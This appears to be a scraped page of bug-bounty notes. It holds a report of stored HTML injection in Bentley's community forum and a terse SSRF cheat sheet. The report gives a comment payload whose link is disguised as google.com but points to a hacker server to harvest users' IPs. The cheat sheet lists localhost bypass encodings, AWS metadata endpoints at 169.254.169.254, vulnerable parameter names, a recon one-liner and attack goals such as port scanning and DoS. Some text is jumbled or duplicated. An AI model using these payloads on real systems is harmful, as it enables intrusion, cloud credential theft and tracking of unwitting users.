access to Jira Service Desk portals that have the 'Anyone can email the service
desk or raise a request in the portal' setting enabled. Changing this setting does
not defend against an attacker that has portal access via other means. Atlassian
does not recommend changing the setting.

=================================================================
Hello team,

Aditya here found bug which is stored external ssrf and able to capture users logs
and IP,s via comment section:

Issue background

External service interaction arises when it is possible to induce an application to


interact with an arbitrary external service, such as a web or mail server. The
ability to trigger arbitrary external service interactions does not constitute a
vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences.

Impact:
The ability to send requests to other systems can allow the vulnerable server to be
used as an attack proxy. By submitting suitable payloads, an attacker can cause the
application server to attack other systems that it can interact with. This may
include public third-party systems, internal systems within the same organization,
or services available on the local loopback adapter of the application server
itself. Depending on the network architecture, this may expose highly vulnerable
internal services that are not otherwise accessible to external attackers. The
facility to generate an email to an arbitrary address is often intended application
behavior. But this is not necessarily the case, particulary in cases where the
destination address is not explicitly entered on-screen by the user.

Steps:

How hacker will exploit this

Go to https://communities.bentley.com/communities/other_communities/sign-
in_assistance_and_web_services/f/cloud-and-web-services-forum/4547/bentley-
download?tempkey=2199dab4-d0ba-4965-a445-0ac853b8d278

Reply to any post and in payload add this as source

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Refresh" content="5;url=https://www.google.com">
</head>
<body>
<p>Sorry! We have moved! The new URL is: <a
href="https://www.hacker_server.com">https://www.google.com</a></p>
<p>You will be redirected to the new address in five seconds.</p>
<p>If you see this message for more than 5 seconds, please click on the link above!
</p>
</body>
</html>

Once user click on google.com , the ip and logs will interact via bentley server to
hacker server.

<p>Sorry! We have moved! The new URL is: <a


href="https://www.hacker_server.com">https://www.google.com</a></p>
<p>You will be redirected to the new address in five seconds.</p>
<p>If you see this message for more than 5 seconds, please click on the link above!
</p>

SSRF
Server Side Request Forgery

IMP:

1. Do exploit then report


2. if DNS then no use
3. Write each step

Detection SSRF : HTTP


1. Burp Collaborator
2. Ext: Collaborator everywhere

Exploits:
1. Port scanning
2. File over a port
3. Backend system scan/machine
4. SSRF to DoS
5. SSRF information disclosure
6. SSRF to aws metadata
7. SSRF to random escaltion
8. Whitelist/Blacklist SSRF bypass

Tool: Waybackurls

Burp

Where ?

Headers
Add link
upload photo
insert URL
add website to bio
convert files

SSRF ?

https://target.com/user/profile?imageurl=https://burplink.net

https://clickjacker.io
https://document.online-convert.com/convert/docx-to-pdf

site.com/admin/ep/img?file=https://test.com/admin.png

IMP : Images : png . jpeg . jpg

look for : cdn-cgi

.
#
@

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://farm1.staticflickr.com.burp.net:80/21/29703429_17b4da0aef.jpg

https://web.archive.org/cdx/search/cdx?
url=*.quizlet.com&output=text&fl=original&collapse=urlkey

======================

Backend

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

echo tomcat.tiler01.huygens.knaw.nl | gau | tee test-ssrf

127.0.0.1
127.0.1
127.1

0.0.0.0
0.0.0
0.0
0

[:]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++==

APIPA

Payloads
http://169.254.169.254/latest/
169.254.169.254/latest
https://169.254.169.254/latest/

You might also like